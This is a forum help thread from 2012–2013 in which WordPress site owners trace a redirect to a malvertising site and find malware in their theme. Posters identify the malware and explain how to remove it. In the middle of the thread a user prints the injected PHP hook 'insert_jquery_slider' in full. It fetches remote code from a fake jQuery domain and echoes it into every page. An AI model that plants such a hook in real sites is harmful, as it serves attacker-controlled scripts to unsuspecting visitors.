Avast WEBforum

Other => Viruses and worms => Topic started by: geryeo on August 23, 2012, 11:42:10 PM

Title: [Solved]
Post by: geryeo on August 23, 2012, 11:42:10 PM: Hello,
i just started a new website few weeks ago, use wordpress + goodnews 3.4 theme. But yesterday when i clicked on a post "something" redirected me to this strange website: downloadmusicfreenow.com.
I cant figure out what can be infected... Please help me fix this.

Thank you!
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: !Donovan on August 24, 2012, 12:24:01 AM: Hi geryeo,

Can you provide the specific post you were on? Use hXtp:// instead of http://.

~!Donovan
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: polonus on August 24, 2012, 01:03:08 AM: Hi geryeo,

Wait for !Donovan to sort this out, but consider these WOT web rep results: http://www.mywot.com/en/scorecard/downloadmusicfreenow.com?utm_source=addon&utm_content=popup-donuts site is given as a malvertiser, so that is likely what will be turned up...
For your site I get a WordPress alert Web application version:
WordPress version: WordPress
Wordpress Version 3.3 or 3.4 based on: htxp://danongonline.net/wp-includes/js/autosave.js
WordPress theme: htxp://danongonline.net/wp-content/themes/goodnews34/
Wordpress internal path: /home/ducvan/public_html/danongonline.net/wp-content/themes/goodnews34/index.php
Therev could be a code issue here:
s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 benign
[nothing detected] (script) s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1
status: (referer=danongonline.net/)saved 23917 bytes 54d6e2713dbe666dfb1c9339d1550616c2204807
info: [img] s.gravatar.com/js/
info: [decodingLevel=0] found JavaScript
suspicious:
For further website security issues, see: http://net.saferpage.de/danongonline

polonus
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: geryeo on August 24, 2012, 10:38:47 AM: @Donovan Sorry, I don't remember that post...

But I found in the theme folder .../post.php this part of code which looks very strange: ... jquerye.com/jquery-1.6.3.min.js ...
Shouldn't there be jquery.com?

Is there any good malware scanner site where i can upload the theme (think there is the problem) and check it?

Thanks
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: polonus on August 24, 2012, 01:38:55 PM: Yes gereyo, that is malcode. !Donovan reported a similar case in another thread...jqueries was used there (plural), apparently they are variations on the same injected malcode theme,

polonus
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: geryeo on August 24, 2012, 01:46:44 PM: Ok, so now i just need to delete that part with ...jquerye.com/jquery-1.6.3.min.js... to solve it?

Thanks polonus
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: polonus on August 24, 2012, 01:57:11 PM: Hi geryeo,

You are welcome. Here what Sucuri Blog had on this: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html
blog article author = dre armeda

polonus
Title: Re: [Solved]
Post by: RamyNasr on October 11, 2012, 04:24:04 AM: Just to leave this as a reference for all who have similar problem:

The code that I had in my wordpress website was inside the theme folder in a file called functions.init.php and it looked like that:

Code: [Select]
if (!function_exists('insert_jquery_slider')) { function insert_jquery_slider () { if (function_exists('curl_init')) { $url = "http://www.jquerye.com/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $data = curl_exec($ch); curl_close($ch); echo $data; } } add_action('wp_head', 'insert_jquery_slider'); }
If you ever happened to be in the same place, this is how to solve this:

Just search in all your files by text and look for “jquerye” or even better for “insert_jquery_slider” or any of the patters you see in the piece of code above. That should point you where you need! (hint: just remove the whole function)
Title: Re: [Solved]
Post by: polonus on October 11, 2012, 10:31:32 AM: Hi RamyNasr,

We thank you very much for the solutions you found. Glad we could help to arrive there. Stay safe and secure,

polonus
Title: Re: [Solved]
Post by: icejay2000 on April 29, 2013, 12:12:40 AM: Hi, I don't know if I'm a little late to post in here regarding this issue. I am having the same problem. I am trying to edit

<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquery.com";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

I just don't know what part to take out exactly. When mentioned one person said to remove the function, I just need to know exactly what part of the code is the function, as I am totally new to this stuff....I have tried taking certain parts of it out, and I just mess things up. Any help will be greatly appreciated! Thank you in advance.
Title: Re: [Solved]
Post by: !Donovan on April 29, 2013, 12:47:48 AM: Everything that you posted is part of the function. Did you try removing the whole line?

Also: The code you provide says jquery.com, not jquerye.com. Is there any specific reason why you want to remove this?

~!Donovan